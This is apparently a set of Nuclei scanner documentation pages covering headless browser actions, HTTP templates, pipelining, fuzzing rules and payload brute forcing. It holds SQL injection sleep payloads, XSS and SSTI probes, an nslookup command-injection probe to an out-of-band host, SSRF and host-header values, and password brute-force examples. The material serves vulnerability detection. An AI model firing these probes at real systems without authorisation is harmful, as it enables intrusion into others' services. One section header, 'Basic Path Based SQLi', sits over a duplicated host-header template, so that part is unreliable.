- 'status_code == 200'
- 'contains(body, "Backup Migration")'
condition: and
internal: true # <- updated logic (this will skip printing this event/result)
- method: POST
path:
- "{{BaseURL}}/wp-content/plugins/backup-backup/includes/backup-heart.php"
headers:
Content-Dir: "{{rand_text_alpha(10)}}"
matchers:
- type: dsl
dsl:
- 'len(body) == 0'
- 'status_code == 200'
- '!contains(body, "Incorrect parameters")'
condition: and
```
# Headless Protocol
Source: https://docs.projectdiscovery.io/templates/protocols/headless
Learn about using a headless browser with Nuclei
Nuclei supports automation of a browser with simple DSL. Headless browser engine can be fully customized and user actions can be scripted allowing complete control over the browser. This allows for a variety of unique and custom workflows.
```yaml
# Start the requests for the template right here
headless:
```
## Actions
An action is a single piece of Task for the Nuclei Headless Engine. Each action manipulates the browser state in some way, and finally leads to the state that we are interested in capturing.
Nuclei supports a variety of actions. A list of these Actions along with their arguments are given below:
### navigate
Navigate visits a given URL. url field supports variables like `{{BaseURL}}`, `{{Hostname}}` to customize the request fully.
```yaml
action: navigate
args:
url: "{{BaseURL}}
```
### script
Script runs a JS code on the current browser page. At the simplest level, you can just provide a `code` argument with the JS snippet you want to execute, and it will be run on the page.
```yaml
action: script
args:
code: alert(document.domain)
```
Suppose you want to run a matcher on a JS object to inspect its value. This type of data extraction use cases are also supported with nuclei headless. As an example, let's say the application sets an object called `window.random-object` with a value, and you want to match on that value.
```yaml
- action: script
args:
code: window.random-object
name: script-name
...
matchers:
- type: word
part: script-name
words:
- "some-value"
```
Nuclei supports running some custom Javascript, before the page load with the `hook` argument. This will always run the provided Javascript, before any of the pages load.
The example provided hooks `window.alert` so that the alerts that are generated by the application do not stop the crawler.
```yaml
- action: script
args:
code: (function() { window.alert=function(){} })()
hook: true
```
This is one use case, there are many more use cases of function hooking such as DOM XSS Detection and Javascript-Injection based testing techniques. Further examples are provided on examples page.
### click
Click simulates clicking with the Left-Mouse button on an element specified by a selector.
```yaml
action: click
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
```
Nuclei supports a variety of selector types, including but not limited to XPath, Regex, CSS, etc. For more information about selectors, see [here](#selectors).
### rightclick
RightClick simulates clicking with the Right-Mouse button on an element specified by a selector.
```yaml
action: rightclick
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
```
### text
Text simulates typing something into an input with Keyboard. Selectors can be used to specify the element to type in.
```yaml
action: text
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
value: username
```
### screenshot
Screenshots takes the screenshots of a page and writes it to disk. It supports both full page and normal screenshots.
```yaml
action: screenshot
args:
to: /root/test/screenshot-web
```
If you require full page screenshot, it can be achieved with `fullpage: true` option in the args.
```yaml
action: screenshot
args:
to: /root/test/screenshot-web
fullpage: true
```
### time
Time enters values into time inputs on pages in RFC3339 format.
```yaml
action: time
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
value: 2006-01-02T15:04:05Z07:00
```
### select
Select performs selection on an HTML Input by a selector.
```yaml
action: select
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
selected: true
value: option[value=two]
selector: regex
```
### files
Files handles a file upload input on the webpage.
```yaml
action: files
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
value: /root/test/payload.txt
```
### waitfcp
WaitFCP waits for the first piece of meaningful content, such as text or an image, indicating that the page is becoming useful.
```yaml
action: waitfcp
```
### waitfmp
WaitFMP waits for the First Meaningful Paint event, allowing users to proceed when content is visually ready.
```yaml
action: waitfmp
```
### waitdom
WaitDOM waits for the `DOMContentLoaded` event, indicating that the HTML has been loaded and parsed, but without waiting for stylesheets, images, and subframes to finish loading.
```yaml
action: waitdom
```
### waitload
WaitLoad waits the entire page, including dependent resources like stylesheets and images, has been fully loaded.
```yaml
action: waitload
```
### waitidle
WaitIdle waits until the page completely stopped making network requests and reaches a network idle state, indicating that all resources have been loaded.
```yaml
action: waitidle
```
### waitstable
WaitStable waits until the page is stable for *N* duration *(default is `1s`)*.
```yaml
action: waitstable
args:
duration: 5s
```
### waitdialog
WaitDialog will wait for a JavaScript dialog (`alert`, `confirm`, `prompt`, or `onbeforeunload`) to be initialized and then automatically accept it.
```yaml
action: waitdialog
name: alert
args:
max-duration: 5s # (Optional. Default 10s.)
```
This action is useful for detecting triggered XSS payloads with a high level of accuracy and a low rate of false positives.
The `name` property MUST be explicitly defined to ensure the output variable is available for later use by `matchers` or `extractors` wihtin your template. See the example [here](/templates/protocols/headless-examples#xss-detection).
**Output variables:**
* **NAME** *(boolean)*, indicator of JavaScript dialog triggered.
* **NAME\_type** *(string)*, dialog type (`alert`, `confirm`, `prompt`, or `onbeforeunload`).
* **NAME\_message** *(string)*, displayed message dialog.
### getresource
GetResource returns the src attribute for an element.
```yaml
action: getresource
name: extracted-value-src
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
```
### extract
Extract extracts either the Text for an HTML Node, or an attribute as specified by the user.
The below code will extract the Text for the given XPath Selector Element, which can then also be matched upon by name `extracted-value` with matchers and extractors.
```yaml
action: extract
name: extracted-value
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
```
An attribute can also be extracted for an element. For example -
```yaml
action: extract
name: extracted-value-href
args:
by: xpath
xpath: /html/body/div[1]/div[3]/form/div[2]/div[1]/div[1]/div/div[2]/input
target: attribute
attribute: href
```
### setmethod
SetMethod overrides the method for the request.
```yaml
action: setmethod
args:
part: request
method: DELETE
```
### addheader
AddHeader adds a header to the requests / responses. This does not overwrite any pre-existing headers.
```yaml
action: addheader
args:
part: response # can be request too
key: Content-Security-Policy
value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;"
```
### setheader
SetHeader sets a header in the requests / responses.
```yaml
action: setheader
args:
part: response # can be request too
key: Content-Security-Policy
value: "default-src * 'unsafe-inline' 'unsafe-eval' data: blob:;"
```
### deleteheader
DeleteHeader deletes a header from requests / responses.
```yaml
action: deleteheader
args:
part: response # can be request too
key: Content-Security-Policy
```
### setbody
SetBody sets the body for a request / response.
```yaml
action: setbody
args:
part: response # can be request too
body: '{"success":"ok"}'
```
### waitevent
WaitEvent waits for an event to trigger on the page.
```yaml
action: waitevent
args:
event: 'Page.loadEventFired'
```
The list of events supported are listed [here](https://github.com/go-rod/rod/blob/master/lib/proto/definitions.go).
### keyboard
Keyboard simulates a single key-press on the keyboard.
```yaml
action: keyboard
args:
keys: '\r' # this simulates pressing enter key on keyboard
```
`keys` argument accepts key-codes.
### debug
Debug adds a delay of 5 seconds between each headless action and also shows a trace of all the headless events occurring in the browser.
> Note: Only use this for debugging purposes, don't use this in production templates.
```yaml
action: debug
```
### sleep
Sleeps makes the browser wait for a specified duration in seconds. This is also useful for debugging purposes.
```yaml
action: sleep
args:
duration: 5
```
## Selectors
Selectors are how nuclei headless engine identifies what element to execute an action on. Nuclei supports getting selectors by including a variety of options -
| Selector | Description |
| -------------------- | --------------------------------------------------- |
| `r` / `regex` | Element matches CSS Selector and Text Matches Regex |
| `x` / `xpath` | Element matches XPath selector |
| `js` | Return elements from a JS function |
| `search` | Search for a query (can be text, XPATH, CSS) |
| `selector` (default) | Element matches CSS Selector |
## Matchers / Extractor Parts
Valid `part` values supported by **Headless** protocol for Matchers / Extractor are -
| Value | Description |
| ----------------- | ------------------------------- |
| request | Headless Request |
| `` | Action names with stored values |
| raw / body / data | Final DOM response from browser |
## Example Headless Templates
An example headless template to automatically login into DVWA is provided below -
```yaml
id: dvwa-headless-automatic-login
info:
name: DVWA Headless Automatic Login
author: pdteam
severity: high
headless:
- steps:
- args:
url: "{{BaseURL}}/login.php"
action: navigate
- action: waitload
- args:
by: xpath
xpath: /html/body/div/div[2]/form/fieldset/input
action: click
- action: waitload
- args:
by: xpath
value: admin
xpath: /html/body/div/div[2]/form/fieldset/input
action: text
- args:
by: xpath
xpath: /html/body/div/div[2]/form/fieldset/input[2]
action: click
- action: waitload
- args:
by: xpath
value: password
xpath: /html/body/div/div[2]/form/fieldset/input[2]
action: text
- args:
by: xpath
xpath: /html/body/div/div[2]/form/fieldset/p/input
action: click
- action: waitload
matchers:
- part: resp
type: word
words:
- "You have logged in as"
```
More complete examples are provided [here](/templates/protocols/headless-examples).
# Basic HTTP Protocol
Source: https://docs.projectdiscovery.io/templates/protocols/http/basic-http
Learn about using Basic HTTP with Nuclei
Nuclei offers extensive support for various features related to HTTP protocol. Raw and Model based HTTP requests are supported, along with options Non-RFC client requests support too. Payloads can also be specified and raw requests can be transformed based on payload values along with many more capabilities that are shown later on this Page.
HTTP Requests start with a `request` block which specifies the start of the requests for the template.
```yaml
# Start the requests for the template right here
http:
```
## Method
Request method can be **GET**, **POST**, **PUT**, **DELETE**, etc. depending on the needs.
```yaml
# Method is the method for the request
method: GET
```
**Redirects**
Redirection conditions can be specified per each template. By default, redirects are not followed. However, if desired, they can be enabled with `redirects: true` in request details. 10 redirects are followed at maximum by default which should be good enough for most use cases. More fine grained control can be exercised over number of redirects followed by using `max-redirects` field.
An example of the usage:
```yaml
http:
- method: GET
path:
- "{{BaseURL}}/login.php"
redirects: true
max-redirects: 3
```
Currently redirects are defined per template, not per request.
## Path
The next part of the requests is the **path** of the request path. Dynamic variables can be placed in the path to modify its behavior on runtime.
Variables start with `{{` and end with `}}` and are case-sensitive.
`{{BaseURL}}` - This will replace on runtime in the request by the input URL as specified in the target file.
`{{RootURL}}` - This will replace on runtime in the request by the root URL as specified in the target file.
`{{Hostname}}` - Hostname variable is replaced by the hostname including port of the target on runtime.
`{{Host}}` - This will replace on runtime in the request by the input host as specified in the target file.
`{{Port}}` - This will replace on runtime in the request by the input port as specified in the target file.
`{{Path}}` - This will replace on runtime in the request by the input path as specified in the target file.
`{{File}}` - This will replace on runtime in the request by the input filename as specified in the target file.
`{{Scheme}}` - This will replace on runtime in the request by protocol scheme as specified in the target file.
An example is provided below - [https://example.com:443/foo/bar.php](https://example.com:443/foo/bar.php)
| Variable | Value |
| -------------- | -------------------------------------------------------------------------- |
| `{{BaseURL}}` | [https://example.com:443/foo/bar.php](https://example.com:443/foo/bar.php) |
| `{{RootURL}}` | [https://example.com:443](https://example.com:443) |
| `{{Hostname}}` | example.com:443 |
| `{{Host}}` | example.com |
| `{{Port}}` | 443 |
| `{{Path}}` | /foo |
| `{{File}}` | bar.php |
| `{{Scheme}}` | https |
Some sample dynamic variable replacement examples:
```yaml
path: "{{BaseURL}}/.git/config"
# This path will be replaced on execution with BaseURL
# If BaseURL is set to https://abc.com then the
# path will get replaced to the following: https://abc.com/.git/config
```
Multiple paths can also be specified in one request which will be requested for the target.
## Headers
Headers can also be specified to be sent along with the requests. Headers are placed in form of key/value pairs. An example header configuration looks like this:
```yaml
# headers contain the headers for the request
headers:
# Custom user-agent header
User-Agent: Some-Random-User-Agent
# Custom request origin
Origin: https://google.com
```
## Body
Body specifies a body to be sent along with the request. For instance:
```yaml
# Body is a string sent along with the request
body: "{\"some random JSON\"}"
# Body is a string sent along with the request
body: "admin=test"
```
## Session
To maintain a cookie-based browser-like session between multiple requests, cookies are reused by default. This is beneficial when you want to maintain a session between a series of requests to complete the exploit chain or to perform authenticated scans. If you need to disable this behavior, you can use the disable-cookie field.
```yaml
# disable-cookie accepts boolean input and false as default
disable-cookie: true
```
## Request Condition
Request condition allows checking for the condition between multiple requests for writing complex checks and exploits involving various HTTP requests to complete the exploit chain.
The functionality will be automatically enabled if DSL matchers/extractors contain numbers as a suffix with respective attributes.
For example, the attribute `status_code` will point to the effective status code of the current request/response pair in elaboration. Previous responses status codes are accessible by suffixing the attribute name with `_n`, where n is the n-th ordered request 1-based. So if the template has four requests and we are currently at number 3:
* `status_code`: will refer to the response code of request number 3
* `status_code_1` and `status_code_2` will refer to the response codes of the sequential responses number one and two
For example with `status_code_1`, `status_code_3`, and`body_2`:
```yaml
matchers:
- type: dsl
dsl:
- "status_code_1 == 404 && status_code_2 == 200 && contains((body_2), 'secret_string')"
```
Request conditions might require more memory as all attributes of previous responses are kept in memory
## Example HTTP Template
The final template file for the `.git/config` file mentioned above is as follows:
```yaml
id: git-config
info:
name: Git Config File
author: Ice3man
severity: medium
description: Searches for the pattern /.git/config on passed URLs.
http:
- method: GET
path:
- "{{BaseURL}}/.git/config"
matchers:
- type: word
words:
- "[core]"
```
More complete examples are provided [here](/templates/protocols/http/basic-http-examples)
# Connection Tampering
Source: https://docs.projectdiscovery.io/templates/protocols/http/connection-tampering
Learn more about using HTTP pipelining and connection pooling with Nuclei
### Pipelining
HTTP Pipelining support has been added which allows multiple HTTP requests to be sent on the same connection inspired from [http-desync-attacks-request-smuggling-reborn](https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn).
Before running HTTP pipelining based templates, make sure the running target supports HTTP Pipeline connection, otherwise nuclei engine fallbacks to standard HTTP request engine.
If you want to confirm the given domain or list of subdomains supports HTTP Pipelining, [httpx](https://github.com/projectdiscovery/) has a flag `-pipeline` to do so.
An example configuring showing pipelining attributes of nuclei.
```yaml
unsafe: true
pipeline: true
pipeline-concurrent-connections: 40
pipeline-requests-per-connection: 25000
```
An example template demonstrating pipelining capabilities of nuclei has been provided below-
```yaml
id: pipeline-testing
info:
name: pipeline testing
author: pdteam
severity: info
http:
- raw:
- |+
GET /{{path}} HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
attack: batteringram
payloads:
path: path_wordlist.txt
unsafe: true
pipeline: true
pipeline-concurrent-connections: 40
pipeline-requests-per-connection: 25000
matchers:
- type: status
part: header
status:
- 200
```
### Connection pooling
While the earlier versions of nuclei did not do connection pooling, users can now configure templates to either use HTTP connection pooling or not. This allows for faster scanning based on requirement.
To enable connection pooling in the template, `threads` attribute can be defined with respective number of threads you wanted to use in the payloads sections.
`Connection: Close` header can not be used in HTTP connection pooling template, otherwise engine will fail and fallback to standard HTTP requests with pooling.
An example template using HTTP connection pooling-
```yaml
id: fuzzing-example
info:
name: Connection pooling example
author: pdteam
severity: info
http:
- raw:
- |
GET /protected HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64('admin:§password§')}}
attack: batteringram
payloads:
password: password.txt
threads: 40
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Unique string"
part: body
```
# Fuzzing Examples
Source: https://docs.projectdiscovery.io/templates/protocols/http/fuzzing-examples
Review some examples of fuzzing with Nuclei
## Basic SSTI Template
A simple template to discover `{{*}}` type SSTI vulnerabilities.
```yaml
id: fuzz-reflection-ssti
info:
name: Basic Reflection Potential SSTI Detection
author: pdteam
severity: low
variables:
first: "{{rand_int(10000, 99999)}}"
second: "{{rand_int(10000, 99999)}}"
result: "{{to_number(first)*to_number(second)}}"
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # only run on GET URLs
payloads:
reflection:
- '{{concat("{{", "§first§*§second§", "}}")}}'
fuzzing:
- part: query
type: postfix
mode: multiple
fuzz:
- "{{reflection}}"
matchers:
- type: word
part: body
words:
- "{{result}}"
```
## Blind Time Based SQLi Template
A template to detect blind time based SQLi with a time delay analyzer.
```yaml
id: mysql-blind-time-based-sqli
info:
name: MySQL SQLi - Blind Time based
author: pdteam
severity: critical
reference:
- https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrules/src/main/java/org/zaproxy/zap/extension/ascanrules/SqlInjectionMySqlScanRule.java
http:
- payloads:
injections:
low:
- " / sleep([SLEEPTIME]) "
- "' / sleep([SLEEPTIME]) / '"
- "\" / sleep([SLEEPTIME]) / \""
medium:
- " and 0 in (select sleep([SLEEPTIME]) ) -- "
- "' and 0 in (select sleep([SLEEPTIME]) ) -- "
- "\" and 0 in (select sleep([SLEEPTIME]) ) -- "
- " where 0 in (select sleep([SLEEPTIME]) ) -- "
- "' where 0 in (select sleep([SLEEPTIME]) ) -- "
- "\" where 0 in (select sleep([SLEEPTIME]) ) -- "
high:
- "\" where 0 in (select sleep([SLEEPTIME]) ) and \"\"=\""
- " and 0 in (select sleep([SLEEPTIME]) ) "
- "' and 0 in (select sleep([SLEEPTIME]) ) and ''='"
- "\" and 0 in (select sleep([SLEEPTIME]) ) and \"\"=\""
attack: pitchfork
analyzer:
name: time_delay
fuzzing:
- part: request # fuzz all the request parts.
type: postfix
mode: single
fuzz:
- "{{injections}}"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: analyzer
words:
- "true"
```
## Basic XSS Template
A simple template to discover XSS probe reflection in HTML pages.
```yaml
id: fuzz-reflection-xss
info:
name: Basic Reflection Potential XSS Detection
author: pdteam
severity: low
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # only run on GET URLs
payloads:
reflection:
- "6842'\"><9967"
stop-at-first-match: true
fuzzing:
- part: query
type: postfix
mode: single
fuzz:
- "{{reflection}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{reflection}}"
- type: word
part: header
words:
- "text/html"
```
## Basic OpenRedirect Template
A simple template to discover open-redirects issues.
```yaml
id: fuzz-open-redirect
info:
name: Basic Open Redirect Detection
author: pdteam
severity: low
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # only run on GET URLs
payloads:
redirect:
- "https://example.com"
fuzzing:
- part: query
type: replace
mode: single
keys-regex:
- "redirect.*"
fuzz:
- "{{redirect}}"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "{{redirect}}"
- type: status
status:
- 301
- 302
- 307
```
## Basic Path Based SQLi
A example template to discover path-based SQLi issues.
```yaml
http:
# pre-condition to determine if the template should be executed
- pre-condition:
- type: dsl
dsl:
- 'method == "POST"' # only run if method is POST
- 'contains(path,"reset")' # only run if path contains reset word
condition: and
# fuzzing rules
fuzzing:
- part: header # This rule will be applied to the header
type: replace # replace the type of rule (i.e., existing values will be replaced with payload)
mode: multiple # multiple mode (i.e., all existing values will be replaced/used at once)
fuzz:
X-Forwarded-For: "{{domain}}" # here {{domain}} is attacker-controlled server
X-Forwarded-Host: "{{domain}}"
Forwarded: "{{domain}}"
X-Real-IP: "{{domain}}"
X-Original-URL: "{{domain}}"
X-Rewrite-URL: "{{domain}}"
Host: "{{domain}}"
```
## Basic Host Header Injection
A simple template to discover host header injection issues.
```yaml
http:
# pre-condition to determine if the template should be executed
- pre-condition:
- type: dsl
dsl:
- 'method == "POST"' # only run if method is POST
- 'contains(path,"reset")' # only run if path contains reset word
condition: and
# fuzzing rules
fuzzing:
- part: header # This rule will be applied to the header
type: replace # replace the type of rule (i.e., existing values will be replaced with payload)
mode: multiple # multiple mode (i.e., all existing values will be replaced/used at once)
fuzz:
X-Forwarded-For: "{{domain}}" # here {{domain}} is attacker-controlled server
X-Forwarded-Host: "{{domain}}"
Forwarded: "{{domain}}"
X-Real-IP: "{{domain}}"
X-Original-URL: "{{domain}}"
X-Rewrite-URL: "{{domain}}"
Host: "{{domain}}"
```
## Blind SSRF OOB Detection
A simple template to detect Blind SSRF in known-parameters using interactsh with HTTP fuzzing.
```yaml
id: fuzz-ssrf
info:
name: Basic Blind SSRF Detection
author: pdteam
severity: low
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # only run on GET URLs
payloads:
redirect:
- "{{interactsh-url}}"
fuzzing:
- part: query
type: replace
mode: single
keys:
- "dest"
- "redirect"
- "uri"
- "path"
- "continue"
- "url"
- "window"
- "next"
- "data"
- "reference"
- "site"
- "html"
- "val"
- "validate"
- "domain"
- "callback"
- "return"
- "page"
- "feed"
- "host"
- "port"
- "to"
- "out"
- "view"
- "dir"
- "show"
- "navigation"
- "open"
fuzz:
- "https://{{redirect}}"
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "http"
```
## Blind CMDi OOB based detection
A simple template to detect blind CMDI using interactsh
```yaml
id: fuzz-cmdi
info:
name: Basic Blind CMDI Detection
author: pdteam
severity: low
http:
- method: GET
path:
- "{{BaseURL}}"
payloads:
redirect:
- "{{interactsh-url}}"
fuzzing:
fuzz:
- "nslookup {{redirect}}"
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
```
# Fuzzing Overview
Source: https://docs.projectdiscovery.io/templates/protocols/http/fuzzing-overview
Learn about fuzzing HTTP requests with Nuclei
Nuclei supports fuzzing of HTTP requests based on rules defined in the `fuzzing` section of the HTTP request. This allows creating templates for generic Web Application vulnerabilities like SQLi, SSRF, CMDi, etc without any information of the target like a classic web fuzzer. We call this concept as **Fuzzing for Unknown Vulnerabilities**.
### pre-condition
More often than not, we want to only attempt fuzzing on those requests where it makes sense. For example,
* Fuzz Body When Body is Present
* Ignore PreFlight and CONNECT requests
and so on. With Nuclei v3.2.4 we have introduced a new `pre-condition` section which contains conditions when the fuzzing template should be executed.
pre-condition can be considered a twin of [matchers](/templates/reference/matchers) in nuclei. They support all matcher types, including DSL, and the only difference is that this serves a different purpose.
For example, to only execute template on POST request with some body, you can use the following filter.
```yaml
- pre-condition:
- type: dsl
dsl:
- method == POST
- len(body) > 0
condition: and
```
Currently, Only request data like header, host, input, method, path, etc is available, but soon, response data will be available once the support for loading the response along with the request is added.
When writing/executing a template, you can use the -v -svd flags to see all variables available in filters before applying the filter.
### Part
Part specifies what part of the request should be fuzzed based on the specified rules. Available options for this parameter are -
**query** (`default`) - fuzz query parameters for URL
```yaml
fuzzing:
- part: query # fuzz parameters in URL query
```
**path** - fuzz path parameters for requests
```yaml
fuzzing:
- part: path # fuzz path parameters
```
**header** - fuzz header parameters for requests
```yaml
fuzzing:
- part: header # fuzz headers
```
**cookie** - fuzz cookie parameters for requests
```yaml
fuzzing:
- part: cookie # fuzz cookies
```
**body** - fuzz body parameters for requests
```yaml
fuzzing:
- part: body # fuzz parameters in body
```
#### Special Part
**request** - fuzz the entire request (all parts mentioned above)
```yaml
fuzzing:
- part: request # fuzz entire request
```
#### Multiple selective parts
Multiple parts can be selected for fuzzing by defining a `parts` field which is the plural of above allowing selected multiple parts to be fuzzed.
```yaml
fuzzing:
- parts:
- query
- body
- header
```
### Type
Type specifies the type of replacement to perform for the fuzzing rule value. Available options for this parameter are -
1. **replace** (`default`) - replace the value with payload
2. **prefix** - prefix the value with payload
3. **postfix** - postfix the value with payload
4. **infix** - infix the value with payload (place in between)
5. **replace-regex** - replace the value with payload using regex
```yaml
fuzzing:
- part: query
type: postfix # Fuzz query and postfix payload to params
```
### Key-Value Abstraction
In a HTTP request, there are various parts like query, path, headers, cookies, and body and each part has different in various formats. For example, the query part is a key-value pair, the path part is a list of values, the body part can be a JSON, XML, or form-data.
To effectively abstract these parts and allow them to be fuzzed, Nuclei exposes these values as `key` and `value` pairs. This allows users to fuzz based on the key or value of the request part.
For example, Below sample HTTP request can be abstracted as key-value pairs as shown below.
```http
POST /reset-password?token=x0x0x0&source=app HTTP/1.1
Host: 127.0.0.1:8082
User-Agent: Go-http-client/1.1
Cookie: PHPSESSID=1234567890
Content-Length: 23
Content-Type: application/json
Accept-Encoding: gzip
Connection: close
{"password":"12345678"}
```
* **`part: Query`**
| key | value |
| ------ | ------ |
| token | x0x0x0 |
| source | app |
* **`part: Path`**
| key | value |
| ----- | --------------- |
| value | /reset-password |
* **`part: Header`**
| key | value |
| --------------- | ------------------ |
| Host | 127.0.0.1:8082 |
| User-Agent | Go-http-client/1.1 |
| Content-Length | 23 |
| Content-Type | application/json |
| Accept-Encoding | gzip |
| Connection | close |
* **`part: Cookie`**
| key | value |
| --------- | ---------- |
| PHPSESSID | 1234567890 |
* **`part: Body`**
| key | value |
| -------- | -------- |
| password | 12345678 |
**Note:** XML, JSON, Form, Multipart-FormData will be in kv format, but if the Body is binary or in any other format, the entire Body will be represented as a single key-value pair with key as `value` and value as the entire Body.
| key | value |
| ----- | -------------------------- |
| value | "\x08\x96\x01\x12\x07\x74" |
This abstraction really levels up the game since you only need to write a single rule for the Body, and it will be applied to all formats. For example, if you check for SQLi in body values, a single rule will work on all formats, i.e., JSON, XML, Form, Multipart-FormData, etc.
### Mode
Mode specifies the mode in which to perform the replacements. Available modes are -
1. **multiple** (`default`) - replace all values at once
2. **single** - replace one value at a time
```yaml
fuzzing:
- part: query
type: postfix
mode: multiple # Fuzz query postfixing payloads to all parameters at once
```
> **Note**: default values are set/used when other options are not defined.
### Component Data Filtering
Multiple filters are supported to restrict the scope of fuzzing to only interesting parameter keys and values. Nuclei HTTP Fuzzing engine converts request parts into Keys and Values which then can be filtered by their related options.
The following filter fields are supported -
1. **keys** - list of parameter names to fuzz (exact match)
2. **keys-regex** - list of parameter regex to fuzz
3. **values** - list of value regex to fuzz
These filters can be used in combination to run highly targeted fuzzing based on the parameter input. A few examples of such filtering are provided below.
```yaml
# fuzzing command injection based on parameter name value
fuzzing:
- part: query
type: replace
mode: single
keys:
- "daemon"
- "upload"
- "dir"
- "execute"
- "download"
- "log"
- "ip"
- "cli"
- "cmd"
```
```yaml
# fuzzing openredirects based on parameter name regex
fuzzing:
- part: query
type: replace
mode: single
keys-regex:
- "redirect.*"
```
```yaml
# fuzzing ssrf based on parameter value regex
fuzzing:
- part: query
type: replace
mode: single
values:
- "https?://.*"
```
### Fuzz
Fuzz specifies the values to replace with a `type` for a parameter. It supports payloads, DSL functions, etc and allows users to fully utilize the existing nuclei feature-set for fuzzing purposes.
```yaml
# fuzz section for xss fuzzing with stop-at-first-match
payloads:
reflection:
- "6842'\"><9967"
stop-at-first-match: true
fuzzing:
- part: query
type: postfix
mode: single
fuzz:
- "{{reflection}}"
```
```yaml
# using interactsh-url placeholder for oob testing
payloads:
redirect:
- "{{interactsh-url}}"
fuzzing:
- part: query
type: replace
mode: single
keys:
- "dest"
- "redirect"
- "uri"
fuzz:
- "https://{{redirect}}"
```
```yaml
# using template-level variables for SSTI testing
variables:
first: "{{rand_int(10000, 99999)}}"
second: "{{rand_int(10000, 99999)}}"
result: "{{to_number(first)*to_number(second)}}"
http:
...
payloads:
reflection:
- '{{concat("{{", "§first§*§second§", "}}")}}'
fuzzing:
- part: query
type: postfix
mode: multiple
fuzz:
- "{{reflection}}"
```
### Analyzer
Analyzers is a new concept introduced in nuclei fuzzing which allow the engine to make additional verification requests based on a certain logic to verify the vulnerability.
#### time\_delay
The `time_delay` analyzer verifies that the response time of the request is controllable by the fuzzed payload. It uses a Linear Regression algorithm ported from ZAP with alternating requests to determine the server time is actually controllable rather than just noise. You can configure it like so
```yaml
# Create a new time delay analyzer
analyzer:
name: time_delay
# Optionally, you can define parameters for the
# analyzer like below.
#
# the defaults are good enough for most use cases.
parameters:
sleep_duration: 10 # sleep for 10 seconds (default: 5)
requests_limit: 6 # make 6 verification requests (default: 4)
time_correlation_error_range: 0.30 # error range for time correlation (default: 0.15)
time_slope_error_range: 0.40 # error range for time slope (default: 0.30)
```
The following dynamic placeholders are available in payloads with `time_delay` analyzer.
* `[SLEEPTIME]` - The sleep time in seconds for the time delay analyzer.
* `[INFERENCE]` - The inference condition (%d=%d) for the time delay analyzer.
These values are substituted at runtime with the actual values for the analyzer. The following is how a usual verification process looks.
1. Send the request with the payload to the target with 5 second delay.
2. If the response time is less than 5, do nothing.
3. Send the request to the analyzer which queues it with 5 seconds delay.
4. Next a 1 second delay
5. Next a 5 second delay
6. Finally, the last 1 second delay.
If the response time is controllable, the analyzer will report the vulnerability.
Matching for the analyzer matches is pretty straightforward as well. Simiar to interactsh, you can use `part: analyzer` to match the analyzer response.
```yaml
matchers:
- type: word
part: analyzer
words:
- "true"
```
Optionally, you can also extract the `analyzer_details` from the analyzer for matches.
### Example **Fuzzing** template
An example sample template for fuzzing XSS vulnerabilities is provided below.
```yaml
id: fuzz-reflection-xss
info:
name: Basic Reflection Potential XSS Detection
author: pdteam
severity: low
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"' # only run if method is GET
payloads:
reflection:
- "6842'\"><9967"
stop-at-first-match: true
fuzzing:
- part: query
type: postfix
mode: single
fuzz:
- "{{reflection}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{{reflection}}"
- type: word
part: header
words:
- "text/html"
```
More complete examples are provided [here](/templates/protocols/http/fuzzing-examples)
# HTTP Payloads
Source: https://docs.projectdiscovery.io/templates/protocols/http/http-payloads
Learn about bruteforcing HTTP requests using payloads with Nuclei
## Overview
Nuclei engine supports brute forcing any value/component of HTTP Requests using payloads module, that allows to run various type of payloads in multiple format, It's possible to define placeholders with simple keywords (or using brackets `{{helper_function(variable)}}` in case mutator functions are needed), and perform **batteringram**, **pitchfork** and **clusterbomb** attacks.
The **wordlist** for these attacks needs to be defined during the request definition under the Payload field, with a name matching the keyword, Nuclei supports both file based and in template wordlist support and Finally all DSL functionalities are fully available and supported, and can be used to manipulate the final values.
Payloads are defined using variable name and can be referenced in the request in between `{{ }}` marker.
### Difference between **HTTP Payloads** and **HTTP Fuzzing**
While both may sound similar, the major difference between **Fuzzing** and **Payloads/BruteForce** is that Fuzzing is a superset of Payloads/BruteForce and has extra features related to finding Unknown Vulnerabilities while Payloads is just plain brute forcing of values with a given attack type and set of payloads.
## Examples
An example of the using payloads with local wordlist:
```yaml
# HTTP Intruder fuzzing using local wordlist.
payloads:
paths: params.txt
header: local.txt
```
An example of the using payloads with in template wordlist support:
```yaml
# HTTP Intruder fuzzing using in template wordlist.
payloads:
password:
- admin
- guest
- password
```
**Note:** be careful while selecting attack type, as unexpected input will break the template.
For example, if you used `clusterbomb` or `pitchfork` as attack type and defined only one variable in the payload section, template will fail to compile, as `clusterbomb` or `pitchfork` expect more than one variable to use in the template.
## Attack mode
